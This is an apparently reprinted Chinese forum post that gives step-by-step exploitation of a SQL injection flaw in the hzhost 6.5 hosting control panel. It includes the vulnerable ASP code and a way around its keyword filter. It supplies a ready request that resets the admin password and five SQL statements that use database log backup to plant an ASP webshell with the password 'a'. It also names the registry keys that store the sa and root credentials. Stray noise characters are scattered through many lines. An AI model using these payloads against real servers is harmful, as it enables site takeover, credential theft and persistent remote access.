再爆hzhost6.5虚拟主机管理系统的SQL注入漏洞

admin

这次继续爆hzhost6.5虚拟主机管理系统的SQL注入漏洞。
只讲两个要点。
4 I# R$ }8 c6 E1 `第一，如何拿网站管理员权限。
. T- u9 ?9 U5 ]! P/ C% T6 q 第二，如何备份木马。
0 q* {* g- u5 N& s1 N 这次不是简单的注射点，而是经过安全函数过滤的了点。由于对方没有将变量用单引号包起来，而过滤函数又未过滤完全，导致我们有机会进行注射。
我这次还做了个动画。一并发放。希望能让大家玩得"happy"!哈哈。。。
httP://www.xxbing.com QQ178737315
由于我写了很长，而且很累了，所以希望大家回帖鼓励一下。
0 x2 }9 C( b9 W; v) f------------开放浏览-------------
漏洞存在于\hzhost\hzhost_master\control\ot2_mng\ot2_lst.asp文件中！
-------------------------13-15行----------------------------
- @8 J. h: v. `' ^ querytype=SafeRequest("querytype")  //saferequest函数接受数据
if chk_int(querytype)=false then  //检查是否是整数
    ErrMsg="<font color=#ff0000>对不起</font>，非法操作！..."
1 F* H2 m; M; h* ` -------------------------37-42行---------------------------
elseif querytype=5 then //如果类型为5。就接受qu1数据！
- X- i) s& G! F  k   qu1=trim(SafeRequest("qu1"))      //saferequest函数接受数据，他自己定义的saferequest函数！
* K' U- L* n5 M; `( u% ~/ P   
- L; D  T# Q; G! {- [1 V& \    if  qu1="" then  //不能为空
& ?7 t" a" d0 _2 D) a8 m3 `; I* z8 l         call errorpage(-2,"对不起，请选择参数！")
3 A. j" m0 D3 a   end if         
# p4 b, V' I1 T2 s' N, _      qstring=" and s_regstt="&qu1&" "  //这里是关键  qu1没有用单引号包围，虽然用了saferequest，但是我们可以绕过！
7 Z" R- @6 C; l- \ -------------------------62-65行---------------------------
qu7=trim(SafeRequest("qu7")) //saferequest函数接受数据
1 g4 i& p6 k! f% J if qu7<>"" then
qstring2=" and u_nme='"&qu7&"'" //这里被单引号包围了。  这里被包围了，所以这里成了死点！！
end if
--------------------------117行-----------------------------
, P' ]7 k! ]) Z9 `' i: L2 L query="select * from v_ot2lst where  (s_unme='"&session("usrname")&"' or u_fatstr like '%,"&session("usrname")&",%')    "&qstring&qstring2&"  order by "&orderstring
3 x0 G# h( G& g //到这里就丢进去查询了！

来看看saferequest()函数。
------------------incs/config.asp中-------------------------
5 h. o4 K  X0 T Function SafeRequest(ParaName)
8 Y! @' q# i& M, [ Dim ParaValue
9 ?. n9 R# b, a4 q ParaValue=Request(ParaName)  //获取数据
2 h) Y2 e$ P" ~' E2 `/ P% Z1 F if IsNumeric(ParaValue)  then  //如果是数字
SafeRequest=ParaValue  //那就不过滤，直接赋值
exit Function

else
( G& M! G  F  U& W9 A; M1 t ParaValuetemp=lcase(ParaValue)    //如果不是数字，先把接到的数据全部转为小写
tempvalue="select |insert |delete from|'|count(|drop table|update |truncate  |asc(|mid(|char(|xp_cmdshell|exec master|net localgroup administrators|net user| or | and |%20from"
//定义要过滤的字符！
9 f1 X2 b7 o3 t7 C& L& p
& O( a: S4 ~( w2 Y 他过滤方式有问题。。。没有过滤 * / % / -- / ;
) c) T4 F6 x& s/ b. z( j6 n 而且他过滤的都是select+空格。我们用select%09或者select/**/便能饶过。

) H8 q# M; w* K. R6 _ temps=split(tempvalue,"|")           //转为一维数组
for mycount=0 to ubound(temps)       //循环读数组内数据
: t# S  @1 x4 U  s6 z) [( V' r" u if  Instr(ParaValuetemp,temps(mycount)) > 0 then   //判断用户提交的数据是否包含了 非法字符。
1 V3 E# B  a# s. J                 call errorpage(-2,"非法请求！！！")  //如果有则弹出提示！！
/ Q( V) v! A/ \! H( ?/ m                 response.end
end if
next
8 W) l" }3 e0 _( E2 d6 Q SafeRequest=ParaValue
8 S2 ^4 K  Q. R2 [1 \ end if
" f1 [1 T9 Q5 M8 g6 j0 o End function
! z4 v/ r& V2 j1 @2 I3 { -------------------------------------
, W" {  i6 V4 ?0 N6 n
所以我们构造注射点的思路就是：不能出现单引号，update,select等等两边都要用%09（tab）..仔细看清楚。上面过滤的是update+空格。select+空格。
% D2 R' j4 s' D, }* b 先给出查询语句的框架。
select * from v_ot2lst where  (s_unme='username' or u_fatstr like '%,username,%') and s_regstt={我们的语句} and u_nme='1' order by s_addtme desc
2 ]  B" e) I5 Q
为了使语句顺利执行：
我们还要闭合后面的语句。我没有选择注释掉 and u_nme='1' order by s_addtme desc而是闭合他，是因为注释后，实际查询出错了。
这里我给出条示范语句，即{我们的语句}
UPDATE%09[memlst] SET u_pss=0x6531306164633339343962613539616262653536653035376632306638383365 WHERE u_nme=0x61646D696E
' w: G8 g1 @$ O9 C; i9 S$ z. `
: S- L2 J# u: r. U这条语句能够绕过saferequest函数的检测。没有出现单引号。
我们提交：
6 G- ]- K2 n3 k. Xhttp://www.xxxxxx.com/control/ot ... amp;qu1=1;UPDATE%09[memlst] SET u_pss=0x6531306164633339343962613539616262653536653035376632306638383365 WHERE u_nme=0x61646D696E;select%09*%09from%09v_ot2lst where s_regstt=1;select%09*%09from%09v_ot2lst where s_regstt=1

6 }* {1 v9 \' d* ?9 k% c- \ 这句话就能够将admin的密码修改成123456
到此第一个目的就达到了。如果admin不是超级管理员。那么请看《HZHOST域名虚拟主机管理系统sql注射漏洞》中所提到的方法。相关语句请自己转换。
第二步是要备份挂马。
大家看动画中的备马这么简单，当初难了我老半天。saferequest过滤了char(
2 D' `" f- p3 q2 w% x& M4 n2 v 导致备马的这条语句失败。
' o, X8 v# V: E& n  adeclare @a sysname,@s varchar(4000) select @a=db_name(),@s=。。。。。。。。。
+ n' k) }. H% Q) s: r6 j8 H. q
5 a5 C/ [8 ^2 x- g+ ` 有人给我建议改成 @s ntext 等等，换类型都不行。因为我们插入的一句话木马已经固定了数据类型。。
' Q  }9 }% a/ J) G% b- J3 o0 w/ z 由于mssql的宽松性。我把varchar(40000)中加了个空格。并把空格替换成%09成为 varchar%09(4000)，也是可以的。这样我们就饶过了char(
: G; ?5 \& q+ \6 p" k: M  I0 E9 o0 z 接下来放出详细语句。大家放入{我们的语句中}
第 一 步:
: m. T( S0 v- z6 e# p3 k create table [dbo].[shit_tmp] ([cmd] [image])--
, l5 c% P7 f. \5 Q 第 二 步
declare @a sysname,@s nvarchar%09(4000)%09select%09@a=db_name(),@s=0x7900690061006F006C007500 backup log @a to disk = @s with init,no_truncate--
- \- ~+ V+ R# l: D 第 三 步
insert%09into%09[shit_tmp](cmd) values(0x3C25657865637574652872657175657374282261222929253E)--
0 ?  n6 k$ N- `3 ] 第 四 步
6 q  T. }6 \8 r; e/ C declare @a sysname,@s nvarchar%09(4000)%09select%09@a=db_name(),@s=0x44003A005C0068007A0068006F00730074005C0068007A0068006F00730074005F006D00610073007400650072005C0031002E00610073007000 backup log @a to disk=@s--
第 五 步
Drop table [shit_tmp]--
4 q) ]; Q% D$ b6 ^4 l+ H7 r
上面5句语句是在d:/hzhost/hzhost_master/下生成一个1.asp。里面包含了一个密码为a的一句话木马。
一般来说，我们就能拿到webshell. 至于拿webshell后，如何取得系统权限。
请看《对HZHOST域名虚拟主机管理系统sql注射漏洞进一步利用！》
. O! L# v' u' B$ _
4 r' p" `: `6 B' T% \2 a7 L1 M/ e最后是答疑部分：
$ _4 ^& q) A% p6 G. U 1:这次是get注射，不像上次是post注射。由于没有文本框字符的限制，所以不需要保存网页到本地。

1 x6 j( D9 I6 i. q. k" w' F& K$ G+ C 2:123456的md5(32)值为e10adc3949ba59abbe56e057f20f883e 用mssql 16进制转换后，成为0x65003100300061006400630033003900340039006200610035003900610062006200650035003600650030003500370066003200300066003800380033006500
这是转为nvarchar型的，我们直接更新这个值。会导致被更新用户的密码为乱码。所以我们要转成varchar型的。即：
" }) s1 ]. i/ d! z& [# E2 `4 S; c 0x6531306164633339343962613539616262653536653035376632306638383365
大家仔细观察，会发现，其实只是去掉了一些00。。
  u8 q5 D0 S7 z& `, h! _9 }$ N: [$ R 所以大家在转换其他md5的时候，注意此问题。
- k) S2 O$ O' ]
6 h' o* R% P5 d! ?% j 3:读sa密码,root密码。我们读的是加密了的。还原必须在本机，每台hzhost主机都有自己的密钥，密钥参与到加密过程。这是导致A主机不能还原B主机密码的原因。
6 y" r4 n1 R$ X5 ?6 M 另 hzhost虚拟主机平台的所有dll文件。还有一些注册表值我都已取得。有会逆向分析的高手，能做出还原密码程序的高手请联系我。我很希望把他的加密方式弄出来。
; E' ?+ [. C2 R* O) U+ W1 Y
4:备马的问题，备份成功后，可能出现乱码，是由于截断了的原因，大家用NBSI3。去掉2个截断的勾，再生成语句执行就行了。
  P# j$ l4 n: i) y7 i6 y1 B' M 有的服务器可能在备马的过程中出现SQL过期，超时。遇到这样的是对方数据库很大，这我也没办法。我没能找出一个比较好的解决方案。大家自己研究吧。

  P' v9 l' R: o; Z/ u) K% R 5：hzhost其实不只这一个注射点，没被单引号包围的变量还有一些。大家自己去找吧。我只是拿出一个来分析。

) ^6 r2 g; U! n' l 6：:
sa密码。root密码。
" z0 v) d/ E; S( Z4 e. Y& t/ [2 } HKEY_LOCAL_MACHINE\software\hzhost\config\settings\
mysqlpass---root密码
8 P6 \/ X+ ?& C, V0 N9 J0 W mssqlpss----sa密码
, |0 c7 ]1 ?/ _
, O9 I! w; U( c7 e' \2 G
! i  q7 Z$ q( E  I! S7 @ 7.如果路径不在D:/hzhost
那么就是你人品问题！进后台找找普通用户FTP/web的路径，也许会有些用。
4 c* W6 z( h; Q0 n' d1 t 或者去读注册表。
HKEY_LOCAL_MACHINE\software\hzhost\config\settings\ 下
"wwwrootpath"="e:\\wwwroot"
"urlsiteroot"="D:\\hzhost\\hzhost_url"
" ^  E: ?  C0 w+ T "ftprootpath"="e:\\ftproot"   可以看出什么？ 绝对路径放在注册表中。把注册表中的值更新到某个字段，再去读就行了。（比如用户e-mail中。。）
大家自己去试。我没有碰到不在D盘的hzhost.。只是个思路！

利用动画下载地址（送给菜鸟同学们，能看懂文章的大不必下载，只是把文章的内容完全演示了一遍。）
; _5 V9 B7 q; Chzhost最新漏洞.rar
. [: g) I5 I$ c- I" Q 饿。纳米盘速度可能不咋地。但是由于偶的空间FTP坏了。所以，只能放到这里。抱歉啊！！
3 ?' b8 \( Y) Y' n* z- ^" {
最后，还是版权。
http://www.xxbing.com QQ178737315
6 P5 {' o1 [8 x2 j5 V 允许自由转载。但请注明作者。